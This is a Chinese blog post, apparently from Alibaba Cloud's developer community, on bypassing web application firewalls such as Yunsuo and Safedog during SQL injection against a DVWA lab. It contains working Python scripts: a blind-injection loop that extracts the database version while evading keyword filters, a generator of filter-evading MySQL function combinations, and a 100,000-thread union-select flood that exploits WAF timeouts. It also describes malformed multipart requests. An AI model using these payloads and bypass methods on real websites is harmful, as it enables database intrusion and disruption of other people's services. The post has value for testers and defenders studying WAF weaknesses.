我的ByPassWAF之路

2023-05-21 79

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 我的ByPassWAF之路

0x00 背景

没有任何背景,就是想ri过WAF

0x01 有哪些过WAF的手法

第一种：找到未被WAF正则规则收录的数据库关键词

第二种：畸形的HTTP请求

第三种：WAF引擎绕过

0x02 测试环境

server2012

php

MySQL

apache

46560aafee122b5500af07a38166e21c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

0x03 WAF绕过部分思路

替换关键函数绕过云锁&安全狗

绕过实例：

bfbfcd8a9a45f6285fcd35a2af8bbef8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

deba39d587efc1cc89ca5cd2bdcee710_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

be991aa7e0e0393d056200f0c8bd1a7e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

# -*- coding: utf-8 -*-
import requests
import time
url = "http://192.168.81.176/d/vulnerabilities/sqli/"
headers = {
"Cookie": '''security=low; security_session_verify=7a73c0e465f9189db590a3b7d3a8a501; safedog-flow-item=7A37BF7BC93388A6F54A5942DBE5BAED; PHPSESSID=o0ke6kb0iekisbr1lf7tj3mmh8'''
}
res=''
for i in range(1, 33):
for m in range(0, 128):
payload = "ord(mid(version(),{},1))-{}".format(i, m)
# payload = "ord(mid(version(),1,1))-52"
data = {
"id": payload,
"Submit": "Submit"
}
response = requests.post(url=url, headers=headers, data=data)
if "网站防火墙" in response.text:
exit(1)
if "First name: admin" in response.text:
res+=chr(m + 1)
print(res)

bc7d16f74ea516651710e05b12c325da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

绕过遇到的问题及解法

如何找到更多的未保存的函数？
找到这些函数如何使用？

如何找到未被记录的函数

将MySQL函数分为几类
拆分字符串函数：mid、left、lpad等
编码函数：ord、hex、ascii等
运算函数：+ - * / & ^ ! like rlike reg等
空格替换部分：09、0a、0b、0c、0d等
关键数据函数：user()、version()、database()等
然后将这些不同类型的函数组合拼接在一起

例如：

a = ["", "+", "-", "*", "/", " ", "--", "^", "and ", "or ", "!", "@", "`", "~"]
b = ["hex({})", "ord({})", "ascii({})", "", " "]
d = ["LPAD({a})", "LEFT({a})", "MID({a})","POSITION({a})","RIGHT({a})","SUBSTR({a})","SUBSTRING"]
for n in a:
for i in b:
for m in d:
print(n + i.format(m.format(a="version()")))

找到这些函数如何使用

例子：

for i in range(1, 33):
for m in range(0, 128):
payload = "ord(mid(version(),{},1))-{}".format(i, m)
# payload = "ord(mid(version(),1,1))-52"
data = {
"id": payload,
"Submit": "Submit"
}
response = requests.post(url=url, headers=headers, data=data)
if "网站防火墙" in response.text:
exit(1)
if "First name: admin" in response.text:
res+=chr(m + 1)
print(res)

利用畸形的HTTP请求包绕过云锁&安全狗

通过删除form-data绕过检测：

cb46056a1267562e41ffc2103b9ce6cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

通过修改name属性绕过检测：

0395783a9520a6ada43797221a422f9e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

如何获取更多的绕过思路

了解《HTTP权威指南》,里面介绍了很多不常见的请求包。

利用WAF引擎问题绕过WAF

7077d23f96437c597c920a3b31a831af_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

b2568f7f2c010c930a9df59c2d2eb650_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

# -*- coding: utf-8 -*-
import requests
import time
import threading
url = "http://192.168.81.176/d/vulnerabilities/sqli/"
headers = {
"Cookie": '''security=low; security_session_verify=7a73c0e465f9189db590a3b7d3a8a501; safedog-flow-item=7A37BF7BC93388A6F54A5942DBE5BAED; PHPSESSID=o0ke6kb0iekisbr1lf7tj3mmh8'''
}
def main():
payload = "0 union select user(),1 -- -"
data = {
"id": payload,
"Submit": "Submit"
}
try:
response = requests.post(url=url, headers=headers, data=data)
if "root" in response.text:
print(payload)
except:
pass
if __name__ == "__main__":
t = []
for i in range(100000):
a = threading.Thread(target=main)
a.start()
t.append(a)
for i in t:
i.join()

绕过思路：

此类型攻击更适用于云WAF,部分WAF在处理请求的时候,都有各自的处理时常机制。比如A接入WAF,首先要保证A业务正常的访问质量,不可能每一条请求都处理很长时间,否则会导致客户弃用的。

此时可以将同一个payload多次发送,在不触发CC防御机制的情况下,进行测试。

在遇到云WAF的时候,可以尝试这种方式。但要注意客户业务别被打挂了。

0x04 总结一下

抛砖引玉。
通过利用MySQL的机制去绕过WAF,需要了解数据库更多的不常用的函数。
利用HTTP机制去绕过WAF,需要读一下《HTTP权威指南》,里面有很多过WAF的方式。
利用WAF引擎问题去过WAF,需要了解各个厂家WAF的处理逻辑。

我的ByPassWAF之路

0x00 背景

0x01 有哪些过WAF的手法

0x02 测试环境

0x03 WAF绕过部分思路

0x04 总结一下

热门文章

最新文章

相关课程

相关电子书